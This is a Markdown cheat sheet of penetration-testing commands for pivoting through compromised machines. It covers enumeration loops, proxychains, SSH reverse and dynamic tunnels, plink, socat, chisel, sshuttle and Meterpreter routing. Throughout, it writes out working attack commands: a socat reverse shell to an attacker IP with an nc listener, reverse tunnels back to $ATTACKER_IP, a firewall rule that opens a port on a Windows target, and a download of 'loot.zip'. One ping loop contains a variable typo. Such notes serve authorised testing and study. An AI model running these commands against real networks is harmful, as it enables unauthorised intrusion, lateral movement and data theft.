231 lines
6.2 KiB
Markdown
231 lines
6.2 KiB
Markdown
|
# Pivoting
|
||
|
|
||
|
* Tunnelling/Proxying
|
||
|
* Port Forwarding
|
||
|
|
||
|
## Enumeration
|
||
|
|
||
|
### Using material found on the machine and preinstalled tools
|
||
|
|
||
|
* `arp -a`
|
||
|
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
|
||
|
* `/etc/resolv.conf`
|
||
|
* `ipconfig /all`
|
||
|
* `nmcli dev show`
|
||
|
* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
|
||
|
|
||
|
### Scripting Techniques
|
||
|
```sh
|
||
|
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
|
||
|
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
|
||
|
```
|
||
|
* Using local tools through a proxy like `nmap`
|
||
|
|
||
|
## Tools
|
||
|
|
||
|
* Enumerating a network using native and statically compiled tools
|
||
|
|
||
|
### Proxychains / FoxyProxy
|
||
|
|
||
|
* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
|
||
|
```sh
|
||
|
ssh <username>@$ATTACKER_IP -R 9050 -N
|
||
|
```
|
||
|
* Proxychains, e.g. scan target via nmap, or connect via nc through jump server
|
||
|
```sh
|
||
|
proxychains nc <IP> <PORT>
|
||
|
proychains nmap <IP>
|
||
|
proxychains ssh user@$TARGET_IP
|
||
|
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
|
||
|
proxychains wget http://$TARGET_IP:8000/loot.zip
|
||
|
```
|
||
|
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
|
||
|
```sh
|
||
|
[ProxyList]
|
||
|
# add proxy here ...
|
||
|
# meanwhile
|
||
|
# defaults set to "tor"
|
||
|
socks4 127.0.0.1 9050
|
||
|
#socks5 127.0.0.1 1337
|
||
|
# proxy_dns
|
||
|
```
|
||
|
* FoxyProxy, choose proxy type, proxy IP and port in settings
|
||
|
|
||
|
### SSH port forwarding and tunnelling (primarily Unix)
|
||
|
|
||
|
* LocalPortForwarding
|
||
|
```sh
|
||
|
ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
|
||
|
```
|
||
|
* Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver
|
||
|
* Tip: open port on windows target via
|
||
|
```sh
|
||
|
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
|
||
|
```
|
||
|
|
||
|
* Dynamic Port Forwarding
|
||
|
```sh
|
||
|
ssh -D $PORT <user>@<Jumpserver> -fN
|
||
|
```
|
||
|
|
||
|
* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
|
||
|
```sh
|
||
|
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
|
||
|
```
|
||
|
* Tip1: create a user on the attacker to receive the connection without compromising your own password
|
||
|
* Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target
|
||
|
|
||
|
### plink.exe (Windows)
|
||
|
|
||
|
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
|
||
|
```sh
|
||
|
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
|
||
|
```
|
||
|
* Key generation
|
||
|
```sh
|
||
|
puttygen <keyfile> -o key.ppk
|
||
|
```
|
||
|
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
|
||
|
```sh
|
||
|
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
|
||
|
```
|
||
|
|
||
|
### Socat
|
||
|
|
||
|
* Reverse shell on target via
|
||
|
```sh
|
||
|
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
|
||
|
```
|
||
|
* Attacking bind shell
|
||
|
```sh
|
||
|
sudo nc -lvnp 443
|
||
|
```
|
||
|
|
||
|
* Relay on jumpserver via
|
||
|
```sh
|
||
|
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
|
||
|
```
|
||
|
|
||
|
* Quiet Port Forwarding
|
||
|
* On attacker
|
||
|
```sh
|
||
|
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
|
||
|
```
|
||
|
* On relay server
|
||
|
```sh
|
||
|
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
|
||
|
```
|
||
|
* Open `localhost:8000`
|
||
|
|
||
|
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
|
||
|
|
||
|
* In need of a Download on target, expose a port on the attacker via relay
|
||
|
```sh
|
||
|
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
|
||
|
```
|
||
|
|
||
|
### Chisel
|
||
|
|
||
|
* **Does not require SSH on target**
|
||
|
* Reverse Proxy
|
||
|
* Bind port on attacker
|
||
|
```sh
|
||
|
./chisel server -p <ListeningPort> --reverse &
|
||
|
```
|
||
|
* Reverse port on target/proxy
|
||
|
```sh
|
||
|
./chisel client <attacker-IP>:<attacker-Port> R:socks &
|
||
|
```
|
||
|
* `proxychains.conf` contains
|
||
|
```sh
|
||
|
[ProxyList]
|
||
|
socks5 127.0.0.1 <Listening-Port>
|
||
|
```
|
||
|
|
||
|
* Forward SOCKS Proxy
|
||
|
* Proxy/compromised machine
|
||
|
```sh
|
||
|
./chisel server -p <Listen-Port> --socks5
|
||
|
```
|
||
|
* On attacker
|
||
|
```sh
|
||
|
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
|
||
|
```
|
||
|
* Remote Port Forward
|
||
|
* On attacker
|
||
|
```sh
|
||
|
./chisel server -p <Listen-Port> --reverse &
|
||
|
```
|
||
|
* On forwarder
|
||
|
```sh
|
||
|
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
|
||
|
```
|
||
|
* Local Port Forwarding
|
||
|
* On proxy
|
||
|
```sh
|
||
|
./chisel server -p <Listen-Port>
|
||
|
```
|
||
|
* On attacker
|
||
|
```sh
|
||
|
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
|
||
|
```
|
||
|
|
||
|
### sshuttle
|
||
|
|
||
|
* `pip install sshuttle`
|
||
|
* `sshuttle -r <user>@<target> <subnet/CIDR>`
|
||
|
* or automatically determined
|
||
|
```sh
|
||
|
sshuttle -r <user>@<target> -N
|
||
|
```
|
||
|
* Key based auth
|
||
|
```sh
|
||
|
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
|
||
|
```
|
||
|
* Exclude servers via `-x`, for example the target/gateway server
|
||
|
|
||
|
### Meterpreter
|
||
|
|
||
|
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
|
||
|
```sh
|
||
|
portfwd add -l 22 -p 22 -r 127.0.0.1
|
||
|
```
|
||
|
|
||
|
#### Meterpreter add Subnet Route
|
||
|
|
||
|
```sh
|
||
|
run get_local_subnets
|
||
|
background
|
||
|
route add 10.1.1.0 255.255.255.0 1
|
||
|
route print
|
||
|
```
|
||
|
* Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/)
|
||
|
|
||
|
#### Meterpreter Auto Routing
|
||
|
|
||
|
* Upload payload and catch it with `multi/handler`
|
||
|
```
|
||
|
background
|
||
|
use post/multi/manage/autoroute
|
||
|
set session 1
|
||
|
set subnet <10.0.0.0>
|
||
|
run
|
||
|
```
|
||
|
|
||
|
#### Meterpreter Proxy Routing
|
||
|
|
||
|
* Specify socks proxy via
|
||
|
```sh
|
||
|
use auxiliary/server/socks_proxy
|
||
|
```
|
||
|
* Set proxychain on attacker accordingly
|
||
|
|
||
|
### rpivot
|
||
|
|
||
|
* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)
|
||
|
* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)
|
||
|
|
||
|
## Links
|
||
|
|
||
|
* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)
|